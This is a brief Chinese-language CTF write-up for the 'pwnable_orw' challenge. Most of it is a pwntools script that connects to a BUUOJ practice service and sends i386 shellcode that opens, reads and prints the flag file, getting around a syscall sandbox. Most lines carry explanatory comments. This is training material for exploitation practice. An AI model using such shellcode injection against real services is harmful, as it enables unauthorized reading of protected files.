pwnable_orw
查看保护
程序加了沙盒,所以用 orw(open、read、write)的方式读取 flag。orw 的汇编在网上能搜到很多现成的写法,这里也可以用 pwntools 自带的 shellcode 生成功能。
from pwn import *
# Connection setup for the write-up's target binary.
file_name = './z1r0'

# NOTE: a truthy `debug` selects the remote service; a falsy value runs the
# local copy of the binary instead.
debug = 1

# 32-bit Linux target, so asm() assembles i386 code; log_level='debug' makes
# pwntools print every byte sent and received.
context(arch='i386', os='linux', log_level='debug')

r = remote('node4.buuoj.cn', 25964) if debug else process(file_name)

# Parsed view of the local binary (not referenced by the rest of the
# visible script).
elf = ELF(file_name)
def dbg():
    """Attach gdb to the current tube `r` for interactive debugging."""
    gdb.attach(target=r)
# open("flag", 0, 0) via int 0x80 (eax=5 is open on i386).
# ecx (flags) and edx (mode) are zeroed; the zero pushed first acts as the
# NUL terminator for the 4-byte string 0x67616c66 ("flag", little-endian),
# and ebx is pointed at that string on the stack.
orw_open = '''
xor ecx,ecx;
xor edx,edx;
push ecx;
push 0x67616c66;
mov ebx,esp;
mov eax,0x5;
int 0x80;
'''

# read(3, buf, 0x100) (eax=3 is read on i386).
# The buffer is the same stack address that held the path (ecx = old ebx).
# The descriptor is hard-coded to 3 rather than taken from open's return
# value, so this assumes open returned fd 3.
orw_read = '''
mov eax,0x3;
mov ecx,ebx;
mov ebx,0x3;
mov edx,0x100;
int 0x80;
'''

# write(1, buf, 0x100) (eax=4 is write on i386).
# ecx and edx are left over from the read stage, so the full 0x100-byte
# window is written to stdout regardless of how many bytes read returned.
orw_write = '''
mov eax,0x4;
mov ebx,0x1;
int 0x80;
'''

# NOTE(review): the write-up says the target is sandboxed; this payload
# relies on open, read and write still being permitted. A syscall filter
# that is meant to protect on-disk secrets has to constrain open/read too,
# or the process must not have file access to them.
shellcode = asm(''.join((orw_open, orw_read, orw_write)))

# sendline appends a newline after the assembled bytes.
r.sendline(shellcode)
r.interactive()